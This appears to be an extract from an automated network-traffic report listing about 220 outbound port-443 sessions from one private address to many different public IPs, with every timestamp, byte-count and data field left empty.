                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24846192.168.2.2337360166.156.28.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24847192.168.2.2360762152.64.209.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24848192.168.2.235375084.224.70.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24849192.168.2.2359910142.18.126.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24850192.168.2.233557458.194.170.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24851192.168.2.234288864.165.254.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24852192.168.2.2352408156.87.83.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24853192.168.2.2343766182.82.149.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24854192.168.2.2335574141.40.43.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24855192.168.2.2345876171.126.0.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24856192.168.2.234346692.226.206.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24857192.168.2.2354620107.130.39.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24858192.168.2.2333476219.195.97.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24859192.168.2.235286242.190.202.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24860192.168.2.233437074.145.47.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24861192.168.2.2336638106.29.149.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24862192.168.2.234431667.248.123.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24863192.168.2.2353972219.210.190.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24864192.168.2.2352378223.158.97.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24865192.168.2.234227285.67.136.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24866192.168.2.234628476.86.139.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24867192.168.2.2347644183.166.232.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24868192.168.2.235206613.215.133.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24869192.168.2.2336192185.203.56.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24870192.168.2.2338518112.133.203.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24871192.168.2.233481853.98.244.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24872192.168.2.2359174154.231.193.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24873192.168.2.2352224216.191.153.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24874192.168.2.2348324102.200.247.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24875192.168.2.233952687.209.53.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24876192.168.2.2335410105.104.140.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24877192.168.2.233442680.37.231.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24878192.168.2.23437461.240.44.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24879192.168.2.234490044.128.172.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24880192.168.2.2355938164.141.114.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24881192.168.2.2346908164.107.118.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24882192.168.2.2360054115.148.206.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24883192.168.2.2348734138.8.33.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24884192.168.2.2339938191.236.54.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24885192.168.2.2348924110.228.130.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24886192.168.2.233967039.127.246.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24887192.168.2.2341012169.109.188.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24888192.168.2.234518691.166.120.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24889192.168.2.234658677.172.102.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24890192.168.2.2357574103.175.200.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24891192.168.2.2345436196.223.86.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24892192.168.2.233929425.74.82.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24893192.168.2.2350254118.194.16.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24894192.168.2.235128887.196.189.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24895192.168.2.2342812123.63.213.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24896192.168.2.2346466178.63.51.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24897192.168.2.2351282118.2.194.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24898192.168.2.2345544220.157.195.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24899192.168.2.233745419.82.190.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24900192.168.2.2356978180.48.110.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24901192.168.2.235879242.250.125.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24902192.168.2.2351894170.206.114.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24903192.168.2.235622023.25.182.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24904192.168.2.2352992126.84.229.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24905192.168.2.235497285.107.175.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24906192.168.2.2333452184.27.1.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24907192.168.2.2359636131.48.160.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24908192.168.2.235240240.132.208.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24909192.168.2.2353808172.5.150.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24910192.168.2.2345166191.51.102.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24911192.168.2.233995627.48.13.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24912192.168.2.2346250140.221.233.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24913192.168.2.233401679.150.134.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24914192.168.2.23581301.251.129.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24915192.168.2.2338916125.94.121.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24916192.168.2.233543054.114.117.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24917192.168.2.2360980217.51.245.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24918192.168.2.234927862.79.178.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24919192.168.2.2336726147.40.110.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24920192.168.2.2358644103.66.105.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24921192.168.2.233405883.175.86.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24922192.168.2.2356778109.95.82.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24923192.168.2.234031837.162.24.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24924192.168.2.233493092.232.58.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24925192.168.2.2339904190.174.123.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24926192.168.2.235423817.6.192.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24927192.168.2.2359644220.179.20.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24928192.168.2.235979231.236.116.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24929192.168.2.2349106179.99.150.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24930192.168.2.2334408123.132.206.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24931192.168.2.23514001.56.120.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24932192.168.2.2345212130.40.38.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24933192.168.2.235963888.141.59.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24934192.168.2.2359632183.115.42.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24935192.168.2.23566585.144.150.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24936192.168.2.2349138160.22.208.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24937192.168.2.236036284.211.112.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24938192.168.2.234375658.52.193.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24939192.168.2.2355938221.144.168.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24940192.168.2.2341668135.133.89.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24941192.168.2.2356998106.92.239.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24942192.168.2.235218450.170.253.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24943192.168.2.2344104103.152.11.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24944192.168.2.2357560126.87.66.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24945192.168.2.2349242143.34.16.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24946192.168.2.235427232.1.158.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24947192.168.2.234171238.236.72.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24948192.168.2.235764666.150.17.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24949192.168.2.234642291.30.69.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24950192.168.2.234390497.79.89.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24951192.168.2.2343596125.128.198.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24952192.168.2.2353012152.61.88.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24953192.168.2.233582643.202.228.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24954192.168.2.2353728121.28.102.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24955192.168.2.23462845.203.176.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24956192.168.2.2337866180.168.186.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24957192.168.2.234211066.148.21.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24958192.168.2.234599048.80.181.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24959192.168.2.2350798159.62.253.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24960192.168.2.2336546119.167.15.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24961192.168.2.23585444.221.31.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24962192.168.2.235928452.206.232.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24963192.168.2.234544687.104.89.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24964192.168.2.234653068.175.213.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24965192.168.2.23477549.201.181.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24966192.168.2.235887248.226.235.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24967192.168.2.23598321.159.124.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24968192.168.2.2345888161.80.26.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24969192.168.2.234694678.113.242.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24970192.168.2.233953624.77.123.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24971192.168.2.233667044.110.108.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24972192.168.2.2356074201.227.92.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24973192.168.2.234108297.150.242.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24974192.168.2.2333596145.73.0.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24975192.168.2.2340612107.171.249.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24976192.168.2.2347272182.113.186.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24977192.168.2.235591272.217.66.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24978192.168.2.2356054126.218.160.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24979192.168.2.2350602160.33.176.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24980192.168.2.2349646140.130.61.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24981192.168.2.234418457.27.28.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24982192.168.2.234273286.186.208.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24983192.168.2.234327835.114.27.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24984192.168.2.2351276189.247.74.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24985192.168.2.233509484.78.186.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24986192.168.2.2355664186.248.39.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24987192.168.2.2358454165.196.121.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24988192.168.2.23429665.253.250.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24989192.168.2.2336224148.247.159.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24990192.168.2.234371276.188.168.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24991192.168.2.2348240156.41.169.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24992192.168.2.2352398133.224.134.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24993192.168.2.2337488165.143.61.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24994192.168.2.2337062223.15.80.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24995192.168.2.2340864124.175.208.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24996192.168.2.234165444.47.152.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24997192.168.2.2336796158.219.92.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24998192.168.2.2339454205.88.47.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24999192.168.2.235519896.74.173.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25000192.168.2.233731089.98.251.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25001192.168.2.2343944162.24.66.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25002192.168.2.2353120128.167.166.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25003192.168.2.2352224163.187.183.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25004192.168.2.2360060176.25.154.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25005192.168.2.234022257.112.118.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25006192.168.2.234647481.113.40.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25007192.168.2.2335588129.158.84.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25008192.168.2.2339910217.103.253.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25009192.168.2.235637448.5.175.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25010192.168.2.2334674121.238.243.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25011192.168.2.236020467.156.189.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25012192.168.2.2348494150.46.79.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25013192.168.2.235069072.193.123.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25014192.168.2.235239282.112.75.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25015192.168.2.2352894119.94.222.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25016192.168.2.235065896.118.10.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25017192.168.2.2353302160.153.105.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25018192.168.2.2337050139.255.4.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25019192.168.2.2341812202.69.5.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25020192.168.2.233319820.156.58.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25021192.168.2.233515678.3.121.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25022192.168.2.2345358133.105.50.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25023192.168.2.234936248.236.116.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25024192.168.2.235756081.47.43.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25025192.168.2.2346130141.187.65.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25026192.168.2.2334916184.32.42.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25027192.168.2.235773683.151.5.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25028192.168.2.234919885.163.219.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25029192.168.2.2333952162.178.210.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25030192.168.2.234963866.141.105.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25031192.168.2.236003481.255.87.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25032192.168.2.2333222169.94.16.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25033192.168.2.2344932102.112.142.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25034192.168.2.233739452.92.29.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25035192.168.2.2352218185.226.56.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25036192.168.2.233575874.230.85.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25037192.168.2.234571237.165.181.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25038192.168.2.2352804184.247.57.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25039192.168.2.2356502217.25.164.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25040192.168.2.234090878.208.89.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25041192.168.2.2351760145.66.67.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25042192.168.2.234354623.138.225.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25043192.168.2.235299492.117.112.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25044192.168.2.235838842.129.248.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25045192.168.2.2344266125.189.164.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25046192.168.2.2333214212.247.185.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25047192.168.2.233417082.204.236.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25048192.168.2.2347284103.137.227.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25049192.168.2.2342394168.4.67.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25050192.168.2.2340946162.131.229.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25051192.168.2.2358812176.67.137.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25052192.168.2.2350692130.112.198.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25053192.168.2.235088824.0.110.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25054192.168.2.2354468120.224.190.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25055192.168.2.2351154108.227.133.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25056192.168.2.234857095.58.205.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25057192.168.2.2343456100.56.254.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25058192.168.2.2336792162.66.66.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25059192.168.2.233437031.43.88.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25060192.168.2.2346946115.119.249.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25061192.168.2.2348380185.109.213.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25062192.168.2.2353132198.7.237.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25063192.168.2.2351588151.205.191.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25064192.168.2.234076068.233.246.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25065192.168.2.234982839.35.195.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25066192.168.2.2356634177.118.106.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25067192.168.2.2360306122.196.22.54443
                                          TimestampBytes transferredDirectionData


